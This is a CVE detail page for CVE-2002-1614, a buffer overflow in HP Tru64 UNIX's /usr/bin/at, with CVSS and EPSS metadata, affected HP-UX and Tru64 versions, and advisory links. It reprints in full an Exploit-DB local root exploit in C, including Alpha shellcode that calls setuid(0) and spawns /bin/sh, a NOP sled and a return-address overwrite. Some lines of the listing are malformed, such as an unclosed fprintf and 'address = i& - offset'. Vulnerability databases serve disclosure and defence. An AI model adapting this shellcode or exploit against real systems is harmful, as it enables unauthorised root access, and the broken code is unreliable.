CVE-2002-1614 : Detail

CVE-2002-1614

0.04%V3
Local
2005-03-25
04h00 +00:00
2017-07-10
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Buffer overflow in HP Tru64 UNIX allows local users to execute arbitrary code via a long argument to /usr/bin/at.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 281

Publication date : 2001-03-01 23h00 +00:00
Author : Cody Tubbs
EDB Verified : Yes

/* * Tru64 UNIX 4.0g (JAVA) (/usr/bin/at) local root exploit. [ALPHA] * * Author: Cody Tubbs (loophole of hhp). * Site: www.hhp-programming.net * Email: [email protected] * Date: 2/1/2000. * * I made this without access to gdb, It's untested... * may require modification, may require deletion, heh. * * Note: executable_stack must be on. */ #include <stdio.h> #include <string.h> #define OFFSET 0 #define ALLIGN 0 #define NOP "\x1f\x04\xff\x47" #define DBUF 8000 // 5604+4+528? Manipulate if needed. char shellcode[]= // Alpha setuid(0);+ execl("/bin/sh","sh",0); "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42\xfc\xff\x32" "\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2\xff\x47\x3f\x26\x1f\x04" "\x31\x22\xfc\xff\x30\xb2\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11" "\x14\xe3\x43\x20\x35\x20\x42\xff\xff\xff\xff" "\x30\x15\xd9\x43\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e" "\xb6\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22\x13\x05" "\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26\x2f\x62\x73\x22\x38" "\xff\x7e\xb2\x13\x94\xe7\x43\x20\x35\x60\x42\xff\xff\xff\xff"; //Taeho Oh shellcode. //long get_sp(void){ __asm__("bis $31,$30,$0");} void usage(char *arg) { fprintf(stderr, "\nTru64 UNIX 4.0g (JAVA) (/usr/bin/at)"); fprintf(stderr, " local root exploit. [ALPHA] \n"; fprintf(stderr, "Author: Cody Tubbs (loophole of hhp)\n\n"); fprintf(stderr, "Usage: %s <offset> [allign(0..3)]\n", arg); fprintf(stderr, "Examp: %s 0\n", arg); fprintf(stderr, "Examp: %s 0 1\n", arg); exit(1); } main(int argc, char **argv){ char eipeip[DBUF], buffer[4096], heh[DBUF+1]; char *nop; int i, offset, allign; long address; if(argc < 2){ usage(argv[0]); } if(argc>1){offset=atoi(argv[1]);}else{offset=OFFSET;} if(argc>2){allign=atoi(argv[2]);}else{allign=ALLIGN;} //address = get_sp() - offset; address = i& - offset; if(allign>0){for(i=0;i<DBUF;i++){eipeip[i]=0x69;}} for(i=allign;i<DBUF;i+=4){*(long *)&eipeip[i]=address;} nop=NOP; for(i=0;i<(4096-strlen(shellcode)-strlen(eipeip));i++){ //buffer[i]=nop[i%4]; buffer[i] = 0x1f; buffer[++i] = 0x04; buffer[++i] = 0xff; buffer[++i] = 0x47; } memcpy(buffer+i,shellcode,strlen(shellcode)); memcpy(buffer,"ATEX=",5); putenv(buffer); fprintf(stderr,"Return address %#x, offset: %d.\n",address,offset); execlp("/usr/bin/at","at", eipeip, 0); } // milw0rm.com [2001-03-02]

Products Mentioned

Configuraton 0

Hp>>Hp-ux >> Version 10.20

Hp>>Hp-ux >> Version 11.00

Hp>>Hp-ux >> Version 11.04

Hp>>Hp-ux >> Version 11.11

Hp>>Hp-ux >> Version 11.22

Hp>>Tru64 >> Version 4.0f

Hp>>Tru64 >> Version 4.0g

Hp>>Tru64 >> Version 5.0a

Hp>>Tru64 >> Version 5.1

Hp>>Tru64 >> Version 5.1a

References

http://www.kb.cert.org/vuls/id/435611
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.securityfocus.com/archive/1/290115
Tags : mailing-list, x_refsource_BUGTRAQ